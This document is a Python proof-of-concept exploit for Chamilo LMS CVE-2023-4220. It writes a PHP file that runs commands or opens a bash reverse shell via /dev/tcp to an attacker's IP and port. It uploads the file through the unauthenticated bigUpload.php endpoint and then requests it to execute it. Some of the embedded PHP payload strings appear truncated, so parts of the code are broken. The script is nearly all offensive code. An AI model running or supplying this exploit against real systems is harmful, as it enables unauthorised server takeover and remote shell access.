import argparse import requests import os # Colors for terminal output RED = '\033[0;31m' GREEN = '\033[0;32m' YELLOW = '\033[0;33m' RESET = '\033[0m' # File name for the reverse shell script rev_shell_filename = "shell.php" # Parse command-line options parser = argparse.ArgumentParser(description='POC for Chamilo LMS CVE-2023-4220') parser.add_argument('-u', '--url', required=True, help='Website where you want to upload the payload: http://host:port') parser.add_argument('-c', '--command', help='Command to execute on server') parser.add_argument('-lhost', '--localIP', help='Local IP for reverse shell') parser.add_argument('-lport', '--localPort', help='Local port for reverse shell') args = parser.parse_args() host_url = args.url command_to_execute = args.command local_ip = args.localIP local_port = args.localPort # Create the PHP reverse shell or command execution script with open(rev_shell_filename, "w", encoding='utf-8') as file: if command_to_execute: shell_content = f'' else: shell_content = f'& /dev/tcp/{local_ip}/{local_port} 0>&1\'"); ?>' file.write(shell_content) # Upload the PHP script to the target server try: with open(rev_shell_filename, 'rb') as file: files = {'bigUploadFile': file} upload_url = f"{host_url}/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported" response = requests.post(upload_url, files=files) response.raise_for_status() print(f"{GREEN}File {rev_shell_filename} uploaded successfully.{RESET}") except requests.exceptions.RequestException as e: print(f"{RED}File upload failed: {e}{RESET}") exit(1) # Provide information for reverse shell if not command_to_execute: print(f"{YELLOW}You will get the shell, you can stop this script now.{RESET}") # Execute the uploaded script or get the result result_url = f"{host_url}/main/inc/lib/javascript/bigupload/files/{rev_shell_filename}" response = requests.get(result_url) if command_to_execute: print(f"{GREEN}{response.text}{RESET}")